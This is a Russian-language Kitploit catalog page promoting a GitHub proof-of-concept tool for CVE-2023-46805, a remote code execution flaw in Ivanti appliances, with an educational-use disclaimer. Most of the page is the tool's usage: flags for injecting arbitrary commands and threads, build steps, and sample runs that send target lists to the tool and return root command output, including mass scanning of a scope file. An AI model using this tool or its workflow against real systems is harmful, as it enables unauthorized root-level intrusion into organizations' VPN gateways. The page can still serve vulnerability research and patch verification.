Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-46805 — CVE-2023-46805 Ivanti POC RCE - Ультрабыстрый сканер. | Kitploit
Инструменты/GitHubGitHub/w2xim3/cve-2023-46805
Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubw2xim3/cve-2023-46805

CVE-2023-46805

CVE-2023-46805 Ivanti POC RCE - Ультрабыстрый сканер.

Репозиторий
22 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Название: Доказательство концепции для CVE-2023-46805 — Только для образовательных целей

Лицензия: Эта работа размещена в соответствии с Международной лицензией Creative Commons Attribution 4.0 (CC BY 4.0). Вы можете свободно делиться, копировать, распространять и передавать эту работу, адаптировать её или использовать для других целей, при условии надлежащего указания авторства.

Отказ от ответственности: Это доказательство концепции (PoC) предоставлено только для образовательных целей и исследовательских целей в области кибербезопасности. Ни автор, ни аффилированная организация, ни любая другая сторона, участвующая в создании, производстве или предоставлении этого контента, не несут ответственности за любые убытки, включая, но не ограничиваясь: прямые, косвенные, случайные, особые, косвенные или штрафные убытки, возникшие в результате использования или невозможности использования этого контента.

Образовательная цель: Этот PoC предназначен для помощи сообществу кибербезопасности в понимании и смягчении уязвимости, идентифицированной как CVE-2023-46805. Его не следует использовать в производственной среде или для злонамеренных действий.

Описание уязвимости: Ivanti RCE

Детали PoC:

root@kitploit:~
Usage of ./CVE-Ivanti:
  -cmd string
        The command to replace 'id' in the payload (default "id")
  -t int
        Number of concurrent threads (default 5)

root@kitploit:~
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}

echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'
Скачать инструмент